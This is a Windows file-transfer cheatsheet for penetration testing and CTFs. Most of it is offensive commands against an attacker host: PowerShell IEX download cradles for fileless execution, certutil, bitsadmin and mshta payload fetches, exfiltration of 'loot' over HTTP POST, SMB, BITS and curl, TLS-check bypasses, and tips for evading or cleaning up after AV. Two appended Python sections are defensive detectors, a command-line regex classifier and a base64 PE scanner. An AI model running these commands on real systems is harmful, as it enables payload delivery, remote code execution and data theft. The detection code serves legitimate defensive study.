Windows File Transfer Cheatsheet
Default Ports: SMB 445/tcp · HTTP 80/tcp · FTP 21/tcp · WinRM 5985/5986
“Download” = pulling a file onto the Windows target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only.
PowerShell — Download
# Download to disk
Invoke-WebRequest -Uri http://10.10.14.5/file.exe -OutFile C:\Windows\Temp\file.exe
iwr http://10.10.14.5/file.exe -OutFile file.exe # alias
# Legacy / faster (no progress bar overhead)
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\Temp\file.exe')
# Fileless — execute in memory, nothing touches disk
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1')
(New-Object Net.WebClient).DownloadString('http://10.10.14.5/s.ps1') | IEX
iex (iwr http://10.10.14.5/s.ps1 -UseBasicParsing)
If Invoke-WebRequest hangs, add -UseBasicParsing (no IE engine dependency).
Bypassing common blockers
# Ignore TLS cert errors
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# Force TLS 1.2 (older hosts)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Use a proxy / system creds
$wc = New-Object Net.WebClient
$wc.Proxy = [Net.WebRequest]::GetSystemWebProxy()
$wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
$wc.DownloadFile('http://10.10.14.5/f.exe','f.exe')
PowerShell — Upload (Exfil)
# POST a file to a listener that accepts uploads
Invoke-WebRequest -Uri http://10.10.14.5/upload -Method POST -InFile C:\loot.zip
# Base64 a file, exfil the string, decode on attacker side
# -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 6+ uses -AsByteStream instead
$b64 = [Convert]::ToBase64String((Get-Content -Path 'C:\loot.txt' -Encoding Byte))
# (paste $b64 -> attacker: base64 -d > loot.txt)
Quick attacker-side upload server (Python):
# pip install uploadserver
python3 -m uploadserver 80 # serves + accepts POST /upload
SMB Transfers
Attacker — spin up a share with Impacket:
# Anonymous share named "share" pointing at current dir
impacket-smbserver share $(pwd) -smb2support
# With auth (needed for modern Windows that refuses guest)
impacket-smbserver share $(pwd) -smb2support -user user -password pass
Windows — pull / push:
:: download
copy \\10.10.14.5\share\file.exe C:\Temp\file.exe
:: upload
copy C:\loot.zip \\10.10.14.5\share\loot.zip
:: Map a drive (use creds if required)
net use Z: \\10.10.14.5\share /user:user pass
copy Z:\file.exe .
net use Z: /delete
Copy-Item \\10.10.14.5\share\file.exe C:\Temp\file.exe
If SMB egress (445) is blocked outbound, host the Impacket share on a non-standard port with -port (445 is the default); some setups proxy it.
certutil (LOLBIN)
certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe
certutil -urlcache -f http://10.10.14.5/file.exe C:\Temp\file.exe
:: Base64 encode/decode local files
certutil -encode input.bin out.b64
certutil -decode out.b64 output.bin
Heavily signatured by AV/EDR — expect detection. Clear the cache afterward: certutil -urlcache * delete.
bitsadmin / BITS
bitsadmin /transfer job /download /priority high http://10.10.14.5/file.exe C:\Temp\file.exe
Import-Module BitsTransfer
Start-BitsTransfer -Source http://10.10.14.5/file.exe -Destination C:\Temp\file.exe
# Upload
Start-BitsTransfer -Source C:\loot.zip -Destination http://10.10.14.5/loot.zip -TransferType Upload
BITS survives reboots and runs as a background service — stealthier than a raw WebClient.
Other LOLBINs
:: curl (built in on Windows 10 1803+ / Server 2019+)
curl http://10.10.14.5/file.exe -o file.exe
curl -X POST -F file=@C:\loot.zip http://10.10.14.5/upload
:: wget alias is NOT real wget in PowerShell — it maps to Invoke-WebRequest
:: Download a remote-signed cradle via mshta / regsvr32 / etc. (execution, not just transfer)
mshta http://10.10.14.5/payload.hta
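Each command form in the sections above leaves a recognisable process command line, which is what AV/EDR signatures and process-creation logging (Sysmon Event ID 1, Security 4688) key on. The following is an added example, not part of the original cheatsheet: a Python classifier over command lines, with hypothetical rule names and constructed sample events.

```python
import re

# Rule name -> regex over one process command line. Each pattern mirrors a
# command form listed on this page; the rule names are hypothetical labels.
RULES = {
    "certutil-urlcache":  r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://",
    "certutil-decode":    r"\bcertutil(\.exe)?\b.*[-/]decode\b",
    "bitsadmin-transfer": r"\bbitsadmin(\.exe)?\b.*/transfer\b",
    "bits-cmdlet":        r"\bStart-BitsTransfer\b",
    "webclient-download": r"\.Download(File|String)\(",
    "iwr-outfile":        r"\b(Invoke-WebRequest|iwr)\b.*\s-OutFile\b",
    "download-cradle":    r"\b(IEX|Invoke-Expression)\b.*(DownloadString|Invoke-WebRequest|\biwr\b)"
                          r"|DownloadString\(.*\|\s*(IEX|Invoke-Expression)\b",
    "mshta-remote":       r'\bmshta(\.exe)?\b\s+"?https?://',
    "unc-ip-path":        r"\b(copy|Copy-Item|net\s+use)\b.*\\\\(\d{1,3}\.){3}\d{1,3}\\",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}


def classify(command_line):
    """Return the sorted names of all rules matching one command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(command_line))


def triage(events):
    """Return (Computer, hits) for every event with at least one rule hit."""
    flagged = []
    for ev in events:
        hits = classify(ev["CommandLine"])
        if hits:
            flagged.append((ev["Computer"], hits))
    return flagged


# Constructed events; field names follow Sysmon Event ID 1 (process creation).
SAMPLE_EVENTS = [
    {"Computer": "WS01",
     "CommandLine": "certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe"},
    {"Computer": "WS02",
     "CommandLine": "powershell -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.10.14.5/script.ps1')\""},
    {"Computer": "WS03",  # benign certutil use: must not be flagged
     "CommandLine": r"certutil -hashfile C:\Temp\file.exe SHA256"},
    {"Computer": "WS03",
     "CommandLine": r"cmd /c copy C:\loot.zip \\10.10.14.5\share\loot.zip"},
]

if __name__ == "__main__":
    for computer, hits in triage(SAMPLE_EVENTS):
        print(computer, hits)
```

The fileless cradle raises two rules at once, which is a useful severity signal; the benign `certutil -hashfile` call raises none.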
FTP
Attacker — run a quick FTP server:
python3 -m pyftpdlib -p 21 -w # -w allows anonymous write (upload)
Windows — non-interactive via a script file (works from non-interactive shells):
echo open 10.10.14.5> ftp.txt
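:: -n turns off auto-login, so log in with an explicit "user" command; the next line answers the password prompt
echo user anonymous>> ftp.txt
echo password>> ftp.txt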
echo binary>> ftp.txt
echo get file.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
SCP / SSH
If OpenSSH client is present (default on Win10 1809+):
:: download (USER@HOST is a placeholder)
scp USER@HOST:/tmp/file.exe C:\Temp\file.exe
:: upload
scp C:\loot.zip USER@HOST:/tmp/
Encode / Decode (no network)
When you only have a shell and no transfer channel, paste hex/base64:
# Attacker: base64 the file, then on target:
$b64 = "TVqQAAMA..." # paste here
[IO.File]::WriteAllBytes("C:\Temp\file.exe",[Convert]::FromBase64String($b64))
:: certutil round-trip (see above) also works for binary-safe paste transfers
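A pasted executable stands out in script-block and command-line logs because base64 of a PE file begins with `TVqQ` (the `MZ` header), as in the snippet above. Added example, not from the original page: a Python scanner that finds long base64 runs, including `certutil -encode` output wrapped at 64 columns, and checks the decoded bytes for the MZ/PE header; the function names and the stub header are constructed for the example.

```python
import base64
import re
import struct

B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}")  # long unbroken base64 run
# Newline between two base64 lines (certutil -encode wraps at 64 columns).
WRAP = re.compile(r"(?<=[A-Za-z0-9+/])\r?\n(?=[A-Za-z0-9+/=])")


def pe_verdict(data):
    """Return 'pe', 'mz-only' (header cut short) or None for decoded bytes."""
    if data[:2] != b"MZ":
        return None
    if len(data) < 0x40:
        return "mz-only"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of PE signature
    if e_lfanew + 4 > len(data):
        return "mz-only"
    return "pe" if data[e_lfanew:e_lfanew + 4] == b"PE\0\0" else None


def scan(text):
    """Return one verdict per base64 run in text that decodes to an MZ header."""
    verdicts = []
    for match in B64_RUN.finditer(WRAP.sub("", text)):
        run = match.group()
        # Trim to a multiple of 4 so a truncated log line still decodes.
        verdict = pe_verdict(base64.b64decode(run[: len(run) // 4 * 4]))
        if verdict:
            verdicts.append(verdict)
    return verdicts


def constructed_pe_stub():
    """Constructed 128-byte stand-in for a PE header (not a runnable binary)."""
    dos = b"MZ\x90\x00\x03\x00".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    return dos + b"PE\0\0".ljust(64, b"\0")


if __name__ == "__main__":
    b64 = base64.b64encode(constructed_pe_stub()).decode()
    wrapped = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    print(scan('$b64 = "%s"' % b64))           # pasted PowerShell string
    print(scan("-----BEGIN CERTIFICATE-----\n" + wrapped
               + "\n-----END CERTIFICATE-----\n"))  # certutil -encode layout
    print(scan(b64[:64]))                       # log line cut off early
```

A SHA-256 hex digest is also 64 base64-alphabet characters, so the decode-and-check step is what keeps hashes and ordinary encoded text from being flagged.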
Quick Decision Guide
| Situation | Best option |
|---|---|
| Modern host, outbound 80 open | iwr / Invoke-WebRequest |
| Need fileless execution | IEX (New-Object Net.WebClient).DownloadString(...) |
| AV blocking PowerShell web | SMB via impacket-smbserver |
| Only cmd.exe, no PS | certutil or bitsadmin |
| Win10 1803+/2019+ | curl.exe |
| No network egress at all | base64 paste + [Convert]::FromBase64String |
| Exfil data out | uploadserver + POST, or base64 paste-back |
Attacker-Side Listeners (quick reference)
python3 -m http.server 80 # serve files (download only)
python3 -m uploadserver 80 # serve + accept uploads
impacket-smbserver share $(pwd) -smb2support
python3 -m pyftpdlib -p 21 -w # FTP with write